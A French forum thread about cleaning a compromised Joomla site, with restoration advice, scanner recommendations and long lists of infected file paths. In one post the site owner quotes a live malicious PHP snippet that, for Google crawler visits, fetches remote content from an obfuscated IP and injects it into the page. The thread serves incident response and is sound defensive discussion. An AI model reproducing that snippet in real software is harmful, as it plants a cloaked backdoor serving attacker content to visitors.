Bonjour et bienvenue,

Est-ce que vous êtes seul sur cet hébergement ?

Lorsque cela se produit,
- je monte un environnement en local (uwamp ou wampserver)
- je fais une sauvegarde via AkeebaBackup,
- je rapatrie en local et je lance kickstart d'akeeba
- avant de finir la restauration, je lance un coup d'antivirus Windows
- j'installe sur un autre répertoire une copie propre Joomla avec les composants que j'utilise en dernière version,
- je compare avec winmerge les 2 répertoires et cela donne en général de bons résultats

Il reste :
- le problème du répertoire images qui est souvent l'endroit où se cache les virus (faux fichiers image, fichiers php ou html,...)
- le contenu de la base de données qui peut contenir des saletés dans les messages ou les articles

Pascal

En cherchant à décrire mon souci, j'ai trouvé un bout de code en entete des index.php des trois themes présents qui me paraissent plus que suspicieux .
je viens de les inhiber mais pour le partage de connaissance :

$botbotbot = "...".mb_strtolower($_SERVER[HTTP_USER_AGENT]);$botbotbot = str_replace(" ", "-", $botbotbot);if (strpos($botbotbot,"google")){$ch = curl_init(); $xxx = sqrt(30976); curl_setopt($ch, CURLOPT_URL, "http://$xxx.xx.xxx.xx/cakes/?useragent=$botbotbot&domain=$_SERVER[HTTP_HOST]"); $result = curl_exec($ch); curl_close ($ch); echo $result;}

D'où proviennent vos templates ?

Je suis sur un hébergement mutualisé.
Suite à la remarque sur le fichier image, j'ai trouvé trois .ico vraiment pas catholique que j'ai supprimé.

En template j'ai ashton de www.globbersthemes.com que je n'utilise plus , Quasar de www.rockettheme.com que je n'utilise pas et tx_morph de JoomlArt.com

Il me reste à checker les articles comme indiqué avant la grande reinstalle/comparaison que je n'ai pas envie de faire :-)

Je vois déjà demain si ça revient après le nettoyage des index.php des templates et la suppression des .ico

Merci

Bonjour,

Le nettoyage des index ne réglera rien si un script est caché quelque part dans le dossier du site, ce qui est le plus probable, comme dit par Pascal.
La solution de Pascal est lourde, tu peux aussi ou en plus exécuter aeSecure Quickstart pour rechercher le(s) fautif(s), sachant qu'il faut faire la part des choses entre les fichiers sains où ce quickstart décèle des termes pouvant être indésirables et les vrais indésirables.

Personnellement, lorsque je ne veux pas perdre de temps, j'installe un site vierge et avec JMigrator j'importe toutes les données "core" du site, les tables des extensions et je réinstalle les extensions pour qu'elles prennent en compte leurs précédentes données.
Ensuite, il reste le point délicat : avant de les importer, s'assurer que dans le dossier des images il n'y a pas ce script malicieux ; idem si tu as des dossiers spécifiques pour des documents.

Merci à vous.
Ce matin première fois que le script ne s'est pas éxécuté correctement. Il s'execute mais doit être enfin bloqué
Au niveau des logs, j'ai tout de même des tentatives de connexion régulières de 38.145.70.158
J'ai aussi un blogking.php qui s'est installé sous www/components/com_users/models

Je vais gratter ce week-end le site....

Bonjour

As-tu testé aeSecure QuickScan, sans nul doute il devrait te permettre d'identifier certains scripts malhonnêtes...

Bonne journée.

​​​​Merci.

J'ai crié victoire trop vite : La vérole est revenue entre temps.
J'avais déjà lancé le aeSecure QuickScan .... Je viens de le réinstaller

J'ai beaucoup de Signature : base64_decode mais j'ai du mal à dire si c'est le mal absolu ou si c'est logique ....

Mais comment après modif de tous les mots de passe et modification des droits, un script peut passer outre :-) Le truc à devenir dingue.

Je viens vite de regarder, je suis ... perplexe. Mon programme dit qu'il a détecté, avec certitude, 20 fichiers malsains mais il n'en fait pas mention. Je vois beaucoup de résultats avec des "fortes probabilités" mais je ne vois pas les 20 fichiers qui sont certains. Étrange...

Cela fait maintenant quelques années que j'ai développé QuickScan et il me paraît logique d'avoir une liste des 20 fichiers incriminés... je ne les vois pas dans les résultats. Étonnant.

QuickScan est développé de manière totalement bénévole mais je veux bien prendre le temps de regarder pourquoi les 20 fichiers ne sont pas listés. Si cela te convient, pourrais-tu mettre à ma disposition une copie de ton site (je n'ai besoin que des fichiers; pas de la base de données; une simple archive ZIP avec les fichiers ferait l'affaire).

Si cela te convient, je pourrais alors lancer QuickScan sur ma machine et améliorer l'outil. Comprends bien que je ne vais pas nettoyer ton site; juste l'utiliser pour accroître l'efficacité du script. A toi de voir du coup Envoie-moi un message privé si tu souhaites que je te communique mon email.

>components/com_config/controller/modules/cancel.php

Très simplement parce que le virus serait toujours présent. Dans l'hypothèse où le virus est déjà là, quand quelqu'un accès à tonsite/image/virus.php, il exécute le virus. Que les mots de passe aient été modifié; peu importe; le script se lance dans le contexte du site Joomla (et donc avec les droits de Joomla).

Bonne journée.

Bonjour,

Je m'immisce : vous avez oublié de supprimer QuickScan, donc, j'ai supprimé le lien.

Pascal

Bonjour,

Je viens de faire le nettoyage!

Merci

Mick

Très rapide coup d'oeil entre deux cuissons :

Virus
media\com_finder\css\ajax-setAdvancedSettings.php.suspected
media\jui\css\shell-render.php.suspected
images\ugafajkb.php
images\phocagallery\swe.php.suspected
components\com_users\views\registration\5e3154360a dd8.php
components\com_content\helpers\ajax-setAdvancedSettings.php.suspected

Fichier natif de Joomla mais vérolé
includes\framework.php


Cette liste n'est absolument pas exhaustive

Bonsoir,

Un seul fichier restant avec du code vérolé, et le site est toujours vulnérable.
Il faut mettre le site hors ligne le temps du nettoyage ou le hacker / robot risque de modifier en même temps les fichiers (ou en ajouter de nouveau).

Même après cela, il va falloir trouver par où est entré le hacker ou tous les efforts ne serviront à rien...

Cordialement,

Re,

Quelques autres fichiers vérolés (liste non exhaustive)

* administrator\components\com_phocagallery\librarie s\phocagallery\facebook\fbsystem.php
* administrator\components\com_uddeim\admin.usersett ings.php
* administrator\components\com_categories\sudpfnce.p hp
* administrator\components\com_templates\abulzhce.ph p
* administrator\components\com_users\views\fxwdlvlx. php
* components\com_content\helpers\ajax-setAdvancedSettings.php.suspected
* components\com_users\models\new_side.php
* components\com_users\models\leyeuts.php
* components\com_config\controller\modules\wenscvya. php
* components\com_newsfeeds\views\category\axzflpgx.p hp
* components\com_users\views\registration\5e3154360a dd8.php
* images\ugafajkb.php
* images\phocagallery\swe.php.suspected
* media\com_finder\css\ajax-setAdvancedSettings.php.suspected
* media\jui\css\shell-render.php.suspected
* templates\rt_quasar\language\newsfeed-render.php
* templates\ashton\index.php
* plugins\editors\none\shell-render.php.suspected
* plugins\installer\folderinstaller\lvnpvlud.php
* libraries\fof\render\newsfeed-render.php
* libraries\joomla\database\query\zlbrucfd.php
* libraries\src\pdrizjmt.php

aeSecure QuickScan va les détecter dorénavant; je viens de mettre les fichiers de signatures à jour à l'instant (https://github.com/cavo789/aesecure_quickscan).

Deux autres remarques:

* ton template ashton a toujours mootools d'actif (mootools a disparu au profit de jquery). La version de mootools que tu as date de 2006 (wow!!!)
* uddeIm serait encore en version 3.1 (cette version date de 2013, n'aurais-tu pas oublié quelques mises-à-jour?)

Note : cet exemple me donne une fois encore l'occasion de répéter le mantra suivant: il n'est pas possible de nettoyer un site à la main; sans outil. Les virus peuvent se cacher partout; même dans une image (une fausse gif), un faux robots.txt, ... Il existe quantité de moyens de dissimuler des virus et de rendre exécutable des fichiers qui ne le sont pas (au travers du .htaccess). J'ai déjà vu des virus qui se cachent dans plusieurs fois à la manière d'un puzzle et un script qui collecte les pièces pour exécuter la bestiole.

Quand un site est vérolé; le mieux est toujours de récupérer un backup sain ou d'utiliser des techniques complètes comme celles évoquées par différentes personnes sur ce forum. Chercher les virus en regardant "juste armé de ses yeux" ici et là, dans tel ou tel dossier, n'est juste pas possible. On peut trouver des fichiers, oui (un fichier .php dans le dossier images est obligatoirement suspect) mais un code vérolé qui a été ajouté dans un fichier à priori sain (le fameux includes\framework.php est un parfait exemple); ça, c'est impossible sans un outil dédicacé.

Bonne soirée et bon nettoyage...

Christophe